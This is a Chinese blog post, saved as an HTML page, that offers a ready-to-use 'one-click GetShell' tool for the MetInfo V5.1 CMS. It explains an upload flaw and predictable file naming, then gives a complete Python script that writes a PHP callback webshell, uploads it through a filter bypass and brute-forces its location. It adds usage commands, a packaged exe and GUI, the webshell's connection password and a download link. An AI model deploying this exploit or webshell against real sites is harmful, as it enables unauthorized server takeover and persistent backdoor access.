<!DOCTYPE html>
<html lang="zh-Hans">
    <head>
        <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="Cache-Control" content="no-siteapp">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1, minimum-scale=1, maximum-scale=1">
<meta name="renderer" content="webkit">
<meta name="google" content="notranslate">
<meta name="robots" content="index,follow">


<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Akkuman">
<meta name="twitter:description" content="Akkuman的技术博客">
<meta name="twitter:image:src" content="http://127.0.0.1:8000/images/avatar.png">

<meta property="og:url" content="http://127.0.0.1:8000">
<meta property="og:title" content="Akkuman">
<meta property="og:description" content="Akkuman的技术博客">
<meta property="og:site_name" content="Akkuman">
<meta property="og:image" content="http://127.0.0.1:8000/images/avatar.png">
<meta property="og:type" content="website">
<meta name="robots" content="noodp">

<meta itemprop="name" content="Akkuman">
<meta itemprop="description" content="Akkuman的技术博客">
<meta itemprop="image" content="http://127.0.0.1:8000/images/avatar.png">

<link rel="canonical" href="http://127.0.0.1:8000">

<link rel="shortcut icon" href="/favicon.png">
<link rel="apple-touch-icon" href="/favicon.png">

<link type="text/css" rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/prism.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/zoom.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/main.css">
<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>



<script>var cPlayers = []; var cPlayerOptions = []; /* global queues consumed by the cPlayer bootstrap script at the end of the page */</script>


<script type="text/javascript">
    // Chinese suffixes for relative-time ("… ago") labels, keyed by unit,
    // largest unit first.
    var timeSinceLang = {
        'year':   '年前',
        'month':  '个月前',
        'day':    '天前',
        'hour':   '小时前',
        'minute': '分钟前',
        'second': '秒前'
    };
    // Presumably a URL prefix for the site root; empty on this build — verify in main.js.
    var root = '';
</script>


        <meta name="keywords" content="Hacker,Tools,">
        <meta name="description" content="MetInfo V5.1 GetShell一键化工具">
        <meta name="author" content="Akkuman">
        <title>MetInfo V5.1 GetShell一键化工具</title>
    </head>
    <body>
        
        <header id="header" class="clearfix">
  <div class="container-fluid">
      <div class="row">
          <div class="logo">
              <div class="header-logo">
                <script>
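                  // Pick a random colour class ('b' or 'w') for one glyph of the site title.
                  var getwbclass = function() {
                    var wbclass = ['b', 'w'];
                    return wbclass[Math.floor(Math.random() * wbclass.length)];
                  };
                  var sitetitle = "Akkuman";
                  // Index loop instead of for...in: for...in over a string also walks any
                  // enumerable additions to String.prototype, and the original loop left
                  // `i` as an implicit (undeclared) global.  Only the constant title is
                  // written, so no untrusted data reaches document.write here.
                  for (var i = 0; i < sitetitle.length; i++) {
                    document.write('<a href="/"><span class="' + getwbclass() + ' titlechar">' + sitetitle.charAt(i) + '</span></a>');
                  }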
                  
                </script>
                
                <a id="btn-menu" href="javascript:isMenu();">
                    <span class="b">·</span>
                </a>
                <a href="javascript:isMenu1();">
                    <span id="menu-1" class="bf">1</span>
                </a>
                <a href="javascript:isMenu2();">
                    <span id="menu-2" class="bf">2</span>
                </a>
                <a href="javascript:isMenu3();">
                    <span id="menu-3" class="bf">3</span>
                </a>
              </div>
              <div id="menu-page">
                <a href="/archive.html"><li>归档</li></a>
                <a href="/tag.html"><li>标签</li></a>
                
                <a href="/atom.xml"><li>订阅</li></a>
                
                <a href="about.html"><li>关于</li></a>
              </div>
              <div id="search-box">
                  <div id="search">
                      <input autocomplete="off" type="text" name="s" id="menu-search" placeholder="搜索..." aria-label="搜索" data-root="">
                  </div>
              </div>
          </div>
      </div>
  </div>
  </header>
        <div id="body" class="clearfix">
            <div class="container-fluid">
                <div class="row">
                    <div id="main" class="col-12 clearfix" role="main">
                        <article class="posti" itemscope itemtype="http://schema.org/BlogPosting">
                            <h1 class="post-title" itemprop="name headline">MetInfo V5.1 GetShell一键化工具</h1>
                            <div class="post-meta">
                                <p>
                                    Written by <a itemprop="name" href="/about.me.html" rel="author">Akkuman</a> with ♥ on <time datetime="1465396832" itemprop="datePublished"></time> in <a href="/tag/Hacker/index.html">Hacker </a><a href="/tag/Tools/index.html">Tools </a>
                                </p>
                            </div>
                            <div class="post-content" itemprop="articleBody">
                                <hr />

<h1>漏洞解析：</h1>

<hr />

<p><strong>config/config.inc.php</strong></p>

<pre><code class="language-php">$langoks = $db-&gt;get_one(&quot;SELECT * FROM $met_lang WHERE lang='$lang'&quot;);

if(!$langoks)die('No data in the database,please reinstall.');

if(!$langoks[useok]&amp;&amp;!$metinfoadminok)okinfo('../404.html');

if(count($met_langok)==1)$lang=$met_index_type;

$query = &quot;SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'&quot;;//看这里

$result = $db-&gt;query($query);

while($list_config= $db-&gt;fetch_array($result)){

	if($metinfoadminok)$list_config['value']=str_replace('&quot;', '&amp;#34;', str_replace(&quot;'&quot;, '&amp;#39;',$list_config['value']));

	$settings_arr[]=$list_config;

	if($list_config['columnid']){

		$settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value'];

	}else{

		$settings[$list_config['name']]=$list_config['value'];

	}

}

@extract($settings);
</code></pre>

<hr />

<p>访问</p>

<p>http://localhost/metinfo5.1/index.php?lang=metinfo</p>

<p><code>SELECT * FROM met_config WHERE lang='metinfo' or lang='metinfo'</code></p>

<hr />

<h2>文件命名方式：</h2>

<hr />

<p><strong>/feedback/uploadfile_save.php</strong></p>

<pre><code class="language-php">srand((double)microtime() * 1000000);

$rnd = rand(100, 999);

$name = date('U') + $rnd;

$name = $name.&quot;.&quot;.$ext;

</code></pre>

<p><strong>文件保存在/upload/file/目录</strong></p>

<p>命名方式就是时间戳去掉后三位，紧接着一个三位数的随机数</p>

<p>可爆破：</p>

<p>如</p>

<p><a href="http://127.0.0.1/upload/file/1465394396.php">http://127.0.0.1/upload/file/1465394396.php</a></p>

<hr />

<h1>一键化利用工具：</h1>

<hr />

<p><strong>本程序基于python编写</strong></p>

<pre><code class="language-python">#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import Queue
import threading
import time
import sys


headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36'}

urls = Queue.Queue()
#http://hb.jhxjd.com/upload/file/1441445378.php

def bp(urls,time_out):
    while not urls.empty():
        base_url = urls.get()
        response = None

        try:
            time.sleep(int(time_out))#延时设置
            response = requests.get(base_url,headers=headers)
            if response.status_code == 404:
                print 'Not Fount----%s\n' % base_url
        except:
            continue
        finally:
            if response:
                with open('url.txt','a+') as f:
                    f.write('%s?e=YXNzZXJ0\n'%base_url)

def main(target_url,thread_num,time_out):

    #取出当前时间戳并删除后四位
    now = str(int(time.time()))[:-4]

    #将所有的待爆破地址遍历并加入队列
    for i in range(0,10):
        for j in range(100,1000):
            num_str = ''.join((str(i),str(j)))
            url = ''.join(('%s/upload/file/%s' % (target_url,now),num_str,'.php'))
            urls.put(url)

    #上传文件
    with open('xiaoma.php','w+') as fi:
        fi.write(&quot;&lt;?php $e = $_REQUEST['e'];register_shutdown_function(base64_decode($e), $_REQUEST['Akkuman']);?&gt;&quot;)
    data = {
            'fd_para[1][para]':'filea',
            'fd_para[1][type]':'5'
            }
    files = {'filea': open(&quot;xiaoma.php&quot;, 'rb')}
    upload_url = '%s/feedback/uploadfile_save.php?met_file_format=pphphp&amp;met_file_maxsize=9999&amp;lang=metinfo' % target_url
    res = requests.post(upload_url,data = data,files=files)
    #等待两秒  文件上传
    time.sleep(2)




    #启动多线程
    for i in range(int(thread_num)):
        t = threading.Thread(target = bp,args=(urls,time_out,))
        t.start()


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print 'Example : %s http://www.xxx.com 20 0' % sys.argv[0]
    else:
        main(sys.argv[1],sys.argv[2],sys.argv[3])

</code></pre>

<p>程序略显粗糙</p>

<p>为了方便，我也把他打包成了<strong>exe</strong></p>

<p>然后闲着没事，想着简单地给他做了个<strong>界面</strong>,这样的
<img src="" data-src="http://7xusrl.com1.z0.glb.clouddn.com/MetInfo5.1GetshellGui.png" alt="GUI" /></p>

<hr />

<h1>文件说明</h1>

<hr />

<blockquote>
<p>MetInfo V5.1上传漏洞getshell利用工具</p>

<p>作者 : Akkuman</p>

<p>漏洞原理详见<a href="http://www.wooyun.org/bugs/wooyun-2010-0139168">http://www.wooyun.org/bugs/wooyun-2010-0139168</a></p>

<p>使用说明：
本目录有两个文件，一个py，一个exe
因为exe是py文件打包而成，故文件较大
64位系统测试使用通过</p>

<p>如果你安装了py2.x环境  py文件使用方法
打开cmd
python baopo.py <a href="http://www.xxx.com">http://www.xxx.com</a> 20 0
20是线程数，0是每次请求等待时间（网站限制时可设置为2或3）可以自己指定</p>

<p>exe命令行文件使用方法
打开cmd
baopo.exe <a href="http://www.xxx.com">http://www.xxx.com</a> 20 0
20是线程数，0是每次请求等待时间（网站限制时可设置为2或3）可以自己指定</p>

<p>GUI程序，应该不用说</p>

<p>关于getshell与结果
上传的是回调一句话木马</p>

<pre><code class="language-php">&lt;?php &gt;$e=$_REQUEST['e'];register_shutdown_function(base64_decode($e),$_&gt;REQUEST['Akkuman']);?&gt;
</code></pre>

<p>菜刀连接，密码是Akkuman</p>

<p>爆破结果会生成在<strong>url.txt</strong></p>
</blockquote>

<hr />

<h1>下载地址：</h1>

<hr />

<p><a href="http://cloud.189.cn/t/v263QbMJVJ3u">(访问码:1475)</a></p>

<p><em>转载请注明出处</em></p>

<p><em>作者博客 hacktech.cn | 53xiaoshuo.com</em></p>

                            </div>
                            <div style="display:block;" class="clearfix">
                                <section style="float:left;">
                                    <span itemprop="keywords" class="tags">
                                        tag(s): <a href="/tag/Hacker/index.html">Hacker </a><a href="/tag/Tools/index.html">Tools </a>
                                    </span>
                                </section>
                                <section style="float:right;">
                                    <span><a id="btn-comments" href="javascript:isComments();">show comments</a></span> · <span><a href="javascript:goBack();">back</a></span> · 
                                    <span><a href="/">home</a></span>
                                </section>
                            </div>
                            



<div id="comments" class="gen">
    <script>
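        document.write('<section id="disqus_thread"></section>');
        // Injects the Disqus embed on demand (called from isComments()); the script
        // element is appended to document.head, or document.body as a fallback.
        // Explicit https: replaces the original protocol-relative '//' so this
        // third-party script is never fetched over plain HTTP when the page is.
        // Like any third-party script it runs with the page's origin, which is why
        // it is loaded only when the reader opens the comments.
        var site_comment_load = function disqus() {
            var d = document, s = d.createElement('script');
            s.src = 'https://Akkum4n.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        };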
    </script>
</div>

                        </article>
                    </div>
                </div>
            </div>
        </div>
        <footer id="footer" role="contentinfo">
    <div class="container-fluid">
        <div class="row">
        <div class="col-12">
            &copy; 
            <script type="text/javascript">
                // Current year for the copyright line.
                var currentYear = new Date().getFullYear();
                document.write(currentYear);
            </script>
            <a href="/">Akkuman</a>.
            Using <a target="_blank" rel="noopener noreferrer" href="http://www.chole.io/">Ink</a> &amp; <a target="_blank" href="/">Story</a>.
        </div>
        </div>
    </div>
</footer>

<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/bundle/js/prism.js"></script>
<script src="/bundle/js/zoom-vanilla.min.js"></script>
<script src="/bundle/js/main.js"></script>

<script>
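    // On load, reveal the comment block when the URL fragment points at a
    // comment ('#comment…' or '#respond-post…' anchors).
    window.onload = function () {
        var hash = window.location.hash;
        if (hash === '') {
            return;
        }
        // indexOf() returns a number; the original compared it with the string
        // '-1', which only worked through implicit coercion.
        var isCommentAnchor = hash.indexOf('#comment') !== -1 ||
                              hash.indexOf('#respond-post') !== -1;
        if (isCommentAnchor) {
            document.getElementById('btn-comments').innerText = 'hide comments';
            document.getElementById('comments').style.display = 'block';
            // NOTE(review): unlike isComments(), this path does not call
            // site_comment_load(), so the revealed block stays empty unless
            // something else injects the embed — confirm.
        }
    };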

    // Toggle the three numbered menu buttons; hiding them also hides the
    // sub-panels (menu page and search box) they open.
    function isMenu(){
        var firstButton = document.getElementById('menu-1');
        var shown = firstButton.style.display;
        if (shown !== 'inline' && shown !== 'block') {
            $('#menu-1').fadeIn(150);
            $('#menu-2').fadeIn(150);
            $('#menu-3').fadeIn(150);
            return;
        }
        $('#search-box').fadeOut(200);
        $('#menu-page').fadeOut(200);
        $('#menu-1').fadeOut(500);
        $('#menu-2').fadeOut(400);
        $('#menu-3').fadeOut(300);
    }

    // Toggle the page-links menu (#menu-page).
    function isMenu1(){
        var pageMenu = $('#menu-page');
        var visible = document.getElementById('menu-page').style.display == 'block';
        if (visible) {
            pageMenu.fadeOut(300);
            return;
        }
        pageMenu.fadeIn(300);
    }

    // Toggle the optional #torTree element; no-op when it is absent on this page.
    function isMenu2(){
        var tree = document.getElementById('torTree');
        if (!tree) {
            return;
        }
        var treeQuery = $('#torTree');
        if (tree.style.display == 'block') {
            treeQuery.fadeOut(300);
        } else {
            treeQuery.fadeIn(300);
        }
    }

    // Toggle the search box (#search-box).
    function isMenu3(){
        var searchBox = $('#search-box');
        var visible = document.getElementById('search-box').style.display == 'block';
        if (visible) {
            searchBox.fadeOut(300);
            return;
        }
        searchBox.fadeIn(300);
    }

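    // Toggle the comment block.  The Disqus embed is injected only on the first
    // reveal: site_comment_load() appends a fresh <script> element every time it
    // runs, so the original re-injected the embed on each show/hide cycle.
    function isComments(){
        var button = document.getElementById('btn-comments');
        var panel = document.getElementById('comments');
        if (button.innerText == 'show comments') {
            button.innerText = 'hide comments';
            panel.style.display = 'block';
            // Flag kept on the function itself to avoid adding another global.
            if (!isComments.loaded) {
                isComments.loaded = true;
                site_comment_load();
            }
        } else {
            button.innerText = 'show comments';
            panel.style.display = 'none';
        }
    }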

    // Show the menu buttons and the search box (used when a search finds nothing).
    function Search404(){
        var buttons = ['#menu-1', '#menu-2', '#menu-3'];
        for (var k = 0; k < buttons.length; k++) {
            $(buttons[k]).fadeIn(150);
        }
        $('#search-box').fadeIn(300);
    }

    // Navigate one step back in the session history.
    function goBack(){
        var pageHistory = window.history;
        pageHistory.back();
    }
</script>


<script async>
"use strict";
(function () {
    // Build one cPlayer instance per entry in cPlayerOptions, emptying the host
    // element first, then reset both global queues.
    var buildPlayers = function () {
        var total = cPlayerOptions.length;
        for (var idx = 0; idx < total; idx++) {
            var host = document.getElementById('player' + cPlayerOptions[idx]['id']);
            while (host.hasChildNodes()) {
                host.removeChild(host.firstChild);
            }
            cPlayers[idx] = new cPlayer({
                element: host,
                list: cPlayerOptions[idx]['list']
            });
        }
        cPlayers = [];
        cPlayerOptions = [];
    };

    // Inject the cPlayer library and run buildPlayers once it has loaded.
    // NOTE(review): fetched from a third-party CDN with no `integrity` (SRI)
    // attribute, so the page trusts whatever that host serves; pin a hash on
    // the loader element once one is published.
    var loader = document.createElement('script');
    loader.type = "text/javascript";
    loader.src = "https://cdn.bootcss.com/cplayer/3.2.1/cplayer.js";
    loader.async = true;
    if (loader.readyState) {
        // readyState-based browsers (older IE) fire onreadystatechange instead of onload.
        loader.onreadystatechange = function () {
            var state = loader.readyState;
            if (state == "loaded" || state == "complete") {
                loader.onreadystatechange = null;
                buildPlayers();
            }
        };
    } else {
        loader.onload = buildPlayers;
    }
    document.head.appendChild(loader);
})();
</script>

    </body>
</html>
